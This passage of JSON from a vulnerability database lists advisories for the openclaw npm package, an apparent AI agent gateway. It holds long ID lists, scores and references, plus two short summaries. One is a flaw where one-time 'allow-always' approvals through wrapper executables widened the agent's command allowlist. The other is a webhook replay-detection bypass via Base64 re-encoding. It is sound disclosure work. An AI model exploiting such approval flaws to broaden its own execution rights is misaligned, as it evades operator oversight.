"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability"
:"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability"
:"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability"
:"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability"
:"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability"
:"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-32913","GHSA-6mgf-v5j7-45cr"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vu
lnerabilities/VCID-jad8-5duz-dqg1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89044?format=json","vulnerability_id":"VCID-jbwa-scg3-efeq","summary":"OpenClaw gateway exec allow-always over-trusts positional carrier executables\n## Summary\n\nAllow-always persistence could trust wrapper carrier executables instead of the actual invoked target when commands were routed through dispatch wrappers.\n\n## Impact\n\nA one-time approval could persist a broader future allowlist entry than the operator intended, weakening execution approval boundaries.\n\n## Affected Component\n\n`src/infra/exec-approvals-allowlist.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `9ec44fad39` (`Exec approvals: reject wrapper carrier allow-always targets`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41380","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08327","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08321","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08339","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41380"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"
value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/9ec44fad390f0bc1c29c3cc418b322560cb0222b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p4x4-2r7f-wjxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41380","reference_id":"CVE-2026-41380","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41380"},{"reference_url":"https://github.com/advisories/GHSA-p4x4-2r7f-wjxg","reference_id":"GHSA-p4x4-2r7f-wjxg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p4x4-2r7f-wjxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerab
ility":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerab
ility":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerab
ility":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41380","GHSA-p4x4-2r7f-wjxg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jbwa-scg3-efeq"},{"url":"http://public2.vulnerablecode
.io/api/vulnerabilities/89491?format=json","vulnerability_id":"VCID-jdqk-kv8u-xqa9","summary":"OpenClaw: Telnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n## Summary\nTelnyx Webhook Replay Detection Bypass via Base64 Signature Re-encoding\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 replay hashing treated equivalent Telnyx Base64/Base64URL signatures as distinct requests, but signature verification still held, so lower to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ad77666054651c1fd77b1dc60fd6a8db6600a29a` — 2026-03-30T20:01:43+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41351","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13224","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13264","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41351"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ad77666054651c1fd77b1dc60fd6a8db6600a29a","reference_id":"","reference_type":"","scores":[{"value":"5.